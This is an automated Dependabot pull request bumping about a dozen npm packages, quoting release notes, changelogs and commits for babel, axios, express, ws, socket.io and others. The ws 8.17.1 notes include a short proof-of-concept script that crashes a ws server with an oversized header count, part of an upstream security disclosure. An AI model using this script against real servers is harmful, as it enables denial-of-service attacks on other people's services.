Bump the npm_and_yarn group across 1 directory with 12 updates

[dependabot]

Bumps the npm_and_yarn group with 10 updates in the / directory:

Package	From	To
@babel/traverse	7.21.5	7.24.8
axios	1.4.0	1.7.2
nx-cloud	16.0.5	19.0.0
braces	3.0.2	3.0.3
ejs	3.1.9	3.1.10
express	4.18.2	4.19.2
socket.io	4.6.1	4.7.5
webpack-dev-middleware	5.3.3	5.3.4
ws	8.13.0	8.17.1
socket.io-adapter	2.5.2	2.5.5

Updates @babel/traverse from 7.21.5 to 7.24.8

Release notes

Sourced from @​babel/traverse's releases.

v7.24.8 (2024-07-11)

Thanks @​H0onnn, @​jkup and @​SreeXD for your first pull requests!

👓 Spec Compliance

• babel-parser
  • #16567 Do not use strict mode in TS declare (@​liuxingbaoyu)

🐛 Bug Fix

• babel-generator
  • #16630 Correctly print parens around in in for heads (@​nicolo-ribaudo)
  • #16626 Fix printing of comments in await using (@​nicolo-ribaudo)
  • #16591 fix typescript code generation for yield expression inside type expre… (@​SreeXD)
• babel-parser
  • #16613 Disallow destructuring assignment in using declarations (@​H0onnn)
  • #16490 fix: do not add .value: undefined to regexp literals (@​liuxingbaoyu)
• babel-types
  • #16615 Remove boolean props from ObjectTypeInternalSlot visitor keys (@​nicolo-ribaudo)
• babel-plugin-transform-typescript
  • #16566 fix: Correctly handle export import x = (@​liuxingbaoyu)

💅 Polish

• babel-generator
  • #16625 Avoid unnecessary parens around async in for await (@​nicolo-ribaudo)
• babel-traverse
  • #16619 Avoid checking Scope.globals multiple times (@​liuxingbaoyu)

Committers: 9

• Amjad Yahia Robeen Hassan (@​amjed-98)
• Babel Bot (@​babel-bot)
• Huáng Jùnliàng (@​JLHwung)
• Jon Kuperman (@​jkup)
• Nagendran N (@​SreeXD)
• Nicolò Ribaudo (@​nicolo-ribaudo)
• Sukka (@​SukkaW)
• @​H0onnn
• @​liuxingbaoyu

v7.24.7 (2024-06-05)

🐛 Bug Fix

• babel-node
  • #16554 Allow extra flags in babel-node (@​nicolo-ribaudo)
• babel-traverse
  • #16522 fix: incorrect constantViolations with destructuring (@​liuxingbaoyu)
• babel-helper-transform-fixture-test-runner, babel-plugin-proposal-explicit-resource-management
  • #16524 fix: Transform using in switch correctly (@​liuxingbaoyu)

🏠 Internal

• babel-helpers, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime

... (truncated)

Changelog

Sourced from @​babel/traverse's changelog.

v7.24.8 (2024-07-11)

👓 Spec Compliance

• babel-parser
  • #16567 Do not use strict mode in TS declare (@​liuxingbaoyu)

🐛 Bug Fix

• babel-generator
  • #16630 Correctly print parens around in in for heads (@​nicolo-ribaudo)
  • #16626 Fix printing of comments in await using (@​nicolo-ribaudo)
  • #16591 fix typescript code generation for yield expression inside type expre… (@​SreeXD)
• babel-parser
  • #16613 Disallow destructuring assignment in using declarations (@​H0onnn)
  • #16490 fix: do not add .value: undefined to regexp literals (@​liuxingbaoyu)
• babel-types
  • #16615 Remove boolean props from ObjectTypeInternalSlot visitor keys (@​nicolo-ribaudo)
• babel-plugin-transform-typescript
  • #16566 fix: Correctly handle export import x = (@​liuxingbaoyu)

💅 Polish

• babel-generator
  • #16625 Avoid unnecessary parens around async in for await (@​nicolo-ribaudo)
• babel-traverse
  • #16619 Avoid checking Scope.globals multiple times (@​liuxingbaoyu)

v7.24.7 (2024-06-05)

🐛 Bug Fix

• babel-node
  • #16554 Allow extra flags in babel-node (@​nicolo-ribaudo)
• babel-traverse
  • #16522 fix: incorrect constantViolations with destructuring (@​liuxingbaoyu)
• babel-helper-transform-fixture-test-runner, babel-plugin-proposal-explicit-resource-management
  • #16524 fix: Transform using in switch correctly (@​liuxingbaoyu)

🏠 Internal

• babel-helpers, babel-runtime-corejs2, babel-runtime-corejs3, babel-runtime
  • #16525 Delete unused array helpers (@​blakewilson)

v7.24.6 (2024-05-24)

🐛 Bug Fix

• babel-helper-create-class-features-plugin, babel-plugin-transform-class-properties
  • #16514 Fix source maps for private member expressions (@​nicolo-ribaudo)
• babel-core, babel-generator, babel-plugin-transform-modules-commonjs
  • #16515 Fix source maps for template literals (@​nicolo-ribaudo)
• babel-helper-create-class-features-plugin, babel-plugin-proposal-decorators
  • #16485 Support undecorated static accessor in anonymous classes (@​JLHwung)
  • #16484 Fix decorator bare yield await (@​JLHwung)
• babel-helpers, babel-plugin-proposal-decorators, babel-runtime-corejs3
  • #16483 Fix: throw TypeError if addInitializer is called after finished (@​JLHwung)
• babel-parser, babel-plugin-transform-typescript

... (truncated)

Commits

• 1f5af44 v7.24.8
• c90bb0c [babel 8] Remove methods starting with _ in @babel/traverse (#16504)
• e0368a8 Avoid checking Scope.globals multiple times (#16619)
• 683c654 Enable some lint rules (#16605)
• cfe13c2 [babel 8] Update globals dependency (#16600)
• c36fa6a Update typescript-eslint v8 (#16557)
• 12619ff improve getBindingIdentifiers.keys typing (#16570)
• 424fc90 Update to TypeScript 5.5 (#16536)
• bf1e9a3 v7.24.7
• 4463aa5 fix: incorrect constantViolations with destructuring (#16522)
• Additional commits viewable in compare view

Updates axios from 1.4.0 to 1.7.2

Release notes

Sourced from axios's releases.

Release v1.7.2

Release notes:

Bug Fixes

• fetch: enhance fetch API detection; (#6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.1

Release notes:

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.0

Release notes:

Features

• adapter: add fetch adapter; (#6371) (a3ff99b)

Bug Fixes

• core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Alexandre ABRIOUX

Release v1.7.0-beta.2

Release notes:

Bug Fixes

• fetch: capitalize HTTP method names; (#6395) (ad3174a)
• fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
• fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.0-beta.1

Release notes:

... (truncated)

Changelog

Sourced from axios's changelog.

1.7.2 (2024-05-21)

Bug Fixes

• fetch: enhance fetch API detection; (#6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

1.7.1 (2024-05-20)

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

1.7.0 (2024-05-19)

Features

• adapter: add fetch adapter; (#6371) (a3ff99b)

Bug Fixes

• core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Alexandre ABRIOUX

1.7.0-beta.2 (2024-05-19)

Bug Fixes

• fetch: capitalize HTTP method names; (#6395) (ad3174a)
• fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
• fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

... (truncated)

Commits

• 0e4f9fa chore(release): v1.7.2 (#6414)
• 4f79aef fix(fetch): enhance fetch API detection; (#6413)
• 67d1373 chore(release): v1.7.1 (#6411)
• 733f15f fix(fetch): fixed ReferenceError issue when TextEncoder is not available in t...
• 3041c61 [Release] v1.7.0 (#6408)
• 18b13cb chore(docs): add fetch adapter docs; (#6407)
• e62099b fix(fetch): fixed a possible memory leak in the AbortController for the strea...
• b49aa8e chore(release): v1.7.0-beta.2 (#6403)
• d57f03a chore(ci): bump create-pull-request version to fix a bug; (#6405)
• 097b0d1 chore(ci): add tag resolution for npm releases based on package version; (#6404)
• Additional commits viewable in compare view

Updates nx-cloud from 16.0.5 to 19.0.0

Release notes

Sourced from nx-cloud's releases.

19.0.0 (2024-05-06)

🚀 Features

• bundling: upgrade rollup to v4 (#22656)
• core: load native files from tmp location instead of node_modules (#22648)
• core: add root level forwardAllArgs (#22753)
• core: add API entrypoint to register metadata (#22773)
• core: validate that outputs is an array of strings (#22371)
• core: cleanup for v19 (#22993)
• gradle: add ci-workflow generator (#23125)
• graph: add loading spinner on project details (#23023)
• graph: add target groups and technology icon (#22839)
• graph: show partial project graph & errors in graph app (#22838)
• graph: enable watch mode by default (#23092)
• graph: show tooltips that were previously hidden due to upublished docs (#23099)
• graph: log errors in console in graph watch mode (#23136)
• js: add swc cli options --strip-leading-paths (#22856)
• linter: add convert-to-inferred migration generator (#23142)
• misc: v19 cleanup for Nx plugins (#23104)
• nextjs: Add https option for custom server (#22921)
• nx-dev: new main navigation menu (#22829)
• nx-dev: disable banner on home page (#22992)
• nx-dev: add nx blog (#22828)
• nx-dev: add ui-enterprise library (#23086)
• react: support react 18.3.1 (#23166)
• react-native: upgrade react native to 0.72.6 (#22729)
• repo: split e2e tests (#22927)
• testing: make playwright default e2e test runner option (#22511)
• testing: add playwright generator to convert from executors to plugin (#22784)
• testing: add convert-to-inferred migration generator for cypress (#22884)
• webpack: change plugin import paths to speed up config loading (#23021)

🩹 Fixes

• angular: fix loading postcss configuration in ng-packagr executors (#22900)
• angular: ensure buildable libraries in-process tsconfig file extends from the correct path (#23165)
• bundling: handle circular dependencies in @​nx/esbuild getExtraDependencies (#22644)
• core: repair sourcemap creation in createNodes (#22851)
• core: load config util supports absolute paths on windows (#22837)
• core: keep plugin workers until main process shutdown (#22860)
• core: handle schema validation errors running commands directly (#22864)
• core: forward args provided to the nx add command to the invoked init generator (#22855)
• core: fix hashing of external dependencies (#22865)
• core: group command exit listeners to avoid warning (#22892)
• core: handle plugin errors from isolation correctly (#22890)
• core: disable pty on windows until stable (#22910)
• core: fix cursor being hidden and process shutdown for ctrl c (#22895)
• core: different commands should not be considered compatible targets (#22863)

... (truncated)

Commits

• See full diff in compare view

Updates braces from 3.0.2 to 3.0.3

Commits

• 74b2db2 3.0.3
• 88f1429 update eslint. lint, fix unit tests.
• 415d660 Snyk js braces 6838727 (#40)
• 190510f fix tests, skip 1 test in test/braces.expand
• 716eb9f readme bump
• a5851e5 Merge pull request #37 from coderaiser/fix/vulnerability
• 2092bd1 feature: braces: add maxSymbols (https://github.com/micromatch/braces/issues/...
• 9f5b4cf fix: vulnerability (https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727)
• 98414f9 remove funding file
• 665ab5d update keepEscaping doc (#27)
• Additional commits viewable in compare view

Updates ejs from 3.1.9 to 3.1.10

Release notes

Sourced from ejs's releases.

v3.1.10

Version 3.1.10

Commits

• d3f807d Version 3.1.10
• 9ee26dd Mocha TDD
• e469741 Basic pollution protection
• 715e950 Merge pull request #756 from Jeffrey-mu/main
• cabe314 Include advanced usage examples
• 29b076c Added header
• 11503c7 Merge branch 'main' of github.com:mde/ejs into main
• 7690404 Added security banner to README
• f47d7ae Update SECURITY.md
• 828cea1 Update SECURITY.md
• Additional commits viewable in compare view

Updates express from 4.18.2 to 4.19.2

Release notes

Sourced from express's releases.

4.19.2

What's Changed

• Improved fix for open redirect allow list bypass

Full Changelog: expressjs/express@4.19.1...4.19.2

4.19.1

What's Changed

• Fix ci after location patch by @​wesleytodd in expressjs/express#5552
• fixed un-edited version in history.md for 4.19.0 by @​wesleytodd in expressjs/express#5556

Full Changelog: expressjs/express@4.19.0...4.19.1

4.19.0

What's Changed

• fix typo in release date by @​UlisesGascon in expressjs/express#5527
• docs: nominating @​wesleytodd to be project captian by @​wesleytodd in expressjs/express#5511
• docs: loosen TC activity rules by @​wesleytodd in expressjs/express#5510
• Add note on how to update docs for new release by @​crandmck in expressjs/express#5541
• Prevent open redirect allow list bypass due to encodeurl
• Release 4.19.0 by @​wesleytodd in expressjs/express#5551

New Contributors

• @​crandmck made their first contribution in expressjs/express#5541

Full Changelog: expressjs/express@4.18.3...4.19.0

4.18.3

Main Changes

• Fix routing requests without method
• deps: [email protected]
  • Fix strict json error message on Node.js 19+
  • deps: content-type@~1.0.5
  • deps: [email protected]

Other Changes

• Use https: protocol instead of deprecated git: protocol by @​vcsjones in expressjs/express#5032
• build: [email protected] and [email protected] by @​abenhamdine in expressjs/express#5034
• ci: update actions/checkout to v3 by @​armujahid in expressjs/express#5027
• test: remove unused function arguments in params by @​raksbisht in expressjs/express#5124
• Remove unused originalIndex from acceptParams by @​raksbisht in expressjs/express#5119
• Fixed typos by @​raksbisht in expressjs/express#5117
• examples: remove unused params by @​raksbisht in expressjs/express#5113
• fix: parameter str is not described in JSDoc by @​raksbisht in expressjs/express#5130
• fix: typos in History.md by @​raksbisht in expressjs/express#5131
• build : add [email protected] by @​abenhamdine in expressjs/express#5028
• test: remove unused function arguments in params by @​raksbisht in expressjs/express#5137

... (truncated)

Changelog

Sourced from express's changelog.

4.19.2 / 2024-03-25

• Improved fix for open redirect allow list bypass

4.19.1 / 2024-03-20

• Allow passing non-strings to res.location with new encoding handling checks

4.19.0 / 2024-03-20

• Prevent open redirect allow list bypass due to encodeurl
• deps: [email protected]

4.18.3 / 2024-02-29

• Fix routing requests without method
• deps: [email protected]
  • Fix strict json error message on Node.js 19+
  • deps: content-type@~1.0.5
  • deps: [email protected]
• deps: [email protected]
  • Add partitioned option

Commits

• 04bc627 4.19.2
• da4d763 Improved fix for open redirect allow list bypass
• 4f0f6cc 4.19.1
• a003cfa Allow passing non-strings to res.location with new encoding handling checks f...
• a1fa90f fixed un-edited version in history.md for 4.19.0
• 11f2b1d build: fix build due to inconsistent supertest behavior in older versions
• 084e365 4.19.0
• 0867302 Prevent open redirect allow list bypass due to encodeurl
• 567c9c6 Add note on how to update docs for new release (#5541)
• 69a4cf2 deps: [email protected]
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by wesleytodd, a new releaser for express since your current version.

Updates follow-redirects from 1.15.2 to 1.15.6

Commits

• 35a517c Release version 1.15.6 of the npm package.
• c4f847f Drop Proxy-Authorization across hosts.
• 8526b4a Use GitHub for disclosure.
• b1677ce Release version 1.15.5 of the npm package.
• d8914f7 Preserve fragment in responseUrl.
• 6585820 Release version 1.15.4 of the npm package.
• 7a6567e Disallow bracketed hostnames.
• 05629af Prefer native URL instead of deprecated url.parse.
• 1cba8e8 Prefer native URL instead of legacy url.resolve.
• 72bc2a4 Simplify _processResponse error handling.
• Additional commits viewable in compare view

Updates socket.io from 4.6.1 to 4.7.5

Release notes

Sourced from socket.io's releases.

4.7.5

Bug Fixes

• close the adapters when the server is closed (bf64870)
• remove duplicate pipeline when serving bundle (e426f3e)

Links

• Diff: socketio/socket.io@4.7.4...4.7.5
• Client release: 4.7.5
• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.4

Bug Fixes

• typings: calling io.emit with no arguments incorrectly errored (cb6d2e0), closes #4914

Links

• Diff: socketio/socket.io@4.7.3...4.7.4
• Client release: 4.7.4
• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.3

Bug Fixes

• return the first response when broadcasting to a single socket (#4878) (df8e70f)
• typings: allow to bind to a non-secure Http2Server (#4853) (8c9ebc3)

Links

• Diff: socketio/socket.io@4.7.2...4.7.3
• Client release: 4.7.3
• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.2

Bug Fixes

• clean up child namespace when client is rejected in middleware (#4773) (0731c0d)
• webtransport: properly handle WebTransport-only connections (3468a19)
• webtransport: add proper framing (a306db0)

Links

... (truncated)

Changelog

Sourced from socket.io's changelog.

4.7.5 (2024-03-14)

Bug Fixes

• close the adapters when the server is closed (bf64870)
• remove duplicate pipeline when serving bundle (e426f3e)

Dependencies

• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.4 (2024-01-12)

Bug Fixes

• typings: calling io.emit with no arguments incorrectly errored (cb6d2e0), closes #4914

Dependencies

• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.3 (2024-01-03)

Bug Fixes

• return the first response when broadcasting to a single socket (#4878) (df8e70f)
• typings: allow to bind to a non-secure Http2Server (#4853) (8c9ebc3)

Dependencies

• engine.io@~6.5.2 (no change)
• ws@~8.11.0 (no change)

4.7.2 (2023-08-02)

... (truncated)

Commits

• 5017681 chore(release): 4.7.5
• bf64870 fix: close the adapters when the server is closed
• 748e18c ci: test with older TypeScript version
• b9ce6a2 refactor: create specific adapter for parent namespaces (#4950)
• 54dabe5 ci: upgrade to actions/checkout@4 and actions/setup-node@4
• e426f3e fix: remove duplicate pipeline when serving bundle
• e36062c docs: update the webtransport example
• 0bbe8ae docs: only execute the passport middleware once
• 914a8bd docs: add example with JWT
• d943c3e docs: update the Passport.js example
• Additional commits viewable in compare view

Updates socket.io-parser from 4.2.2 to 4.2.4

Release notes

Sourced from socket.io-parser's releases.

4.2.4

Bug Fixes

• ensure reserved events cannot be used as event names (d9db473)
• properly detect plain objects (b0e6400)

Links

• Diff: socketio/socket.io-parser@4.2.3...4.2.4

4.2.3

⚠️ This release contains an important security fix ⚠️

A malicious client could send a specially crafted HTTP request, triggering an uncaught exception and killing the Node.js process:

TypeError: Cannot convert object to primitive value
       at Socket.emit (node:events:507:25)
       at .../node_modules/socket.io/lib/socket.js:531:14

Please upgrade as soon as possible.

Bug Fixes

• check the format of the event name (3b78117)

Links

• Diff: socketio/socket.io-parser@4.2.2...4.2.3

Changelog

Sourced from socket.io-parser's changelog.

4.2.4 (2023-05-31)

Bug Fixes

• ensure reserved events cannot be used as event names (d9db473)
• properly detect plain objects (b0e6400)

3.4.3 (2023-05-22)

Bug Fixes

• check the format of the event name (2dc3c92)

4.2.3 (2023-05-22)

Bug Fixes

• check the format of the event name (3b78117)

Commits

• 164ba2a chore(release): 4.2.4
• b0e6400 fix: properly detect plain objects
• d9db473 fix: ensure reserved events cannot be used as event names
• 6a5a004 docs(changelog): include changelog for release 3.4.3
• b6c824f chore(release): 4.2.3
• dcc70d9 refactor: export typescript declarations for the commonjs build
• 3b78117 fix: check the format of the event name
• 0841bd5 chore: bump ua-parser-js from 1.0.32 to 1.0.33 (#121)
• See full diff in compare view

Updates webpack-dev-middleware from 5.3.3 to 5.3.4

Release notes

Sourced from webpack-dev-middleware's releases.

v5.3.4

5.3.4 (2024-03-20)

Bug Fixes

• security: do not allow to read files above (#1779) (189c4ac)

Changelog

Sourced from webpack-dev-middleware's changelog.

5.3.4 (2024-03-20)

Bug Fixes

• security: do not allow to read files above (#1779) (189c4ac)

Commits

• 86071ea chore(release): 5.3.4
• 189c4ac fix(security): do not allow to read files above (#1779)
• See full diff in compare view

Updates ws from 8.13.0 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• 934c9d6 [ci] Test on node 22
• 1817bac [ci] Do not test on node 21
• 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
• e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
• Additional commits viewable in